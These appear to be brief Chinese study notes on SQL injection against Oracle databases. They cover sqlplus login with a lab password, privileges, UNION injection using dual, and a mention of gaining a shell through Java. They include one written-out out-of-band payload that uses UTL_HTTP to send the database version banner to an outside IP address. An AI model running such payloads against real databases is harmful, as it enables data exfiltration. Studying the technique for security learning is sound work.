DAY9：SQL注入8-Oracle

1. 如何登陆Oracle 打开cmd输入sqlplus（windows server 2008） 用户名：system 密码：123456   2. 增删改查

 

 

  二、Oracle权限控制 1. Oracle权限（重点）

 

 

2. 用户权限管理 以system账号登录默认DBA权限   3. 表权限管理

 

 

  三、Oracle注入 1. union注入（判断回显点的时候要先确定数据类型，根据类型来union select，并且union语句也要from一个数据库，一般用dual测试，from dual） https://cnblogs.com/peterpan0707007/p/8242119.html https://blog.csdn.net/cclarence/article/details/49784595   2. 利用UTL_HTTP进行注入（常规注入是In Band，这里是OOB--Out Of Band），需要DBA的权限 and (UTL_HTTP.request(‘http://192.168.18.145/sql/Less-1/index.php?id=‘||(select banner from sys.v_$version where rownum=1)))<‘a‘--   3. 利用Oracle注入拿下系统shell（待测试） 原理：Oracle数据库可以利用java代码执行命令    

DAY9：SQL注入8-Oracle

标签：根据   info   space   ace   none   oracle   details   shell   font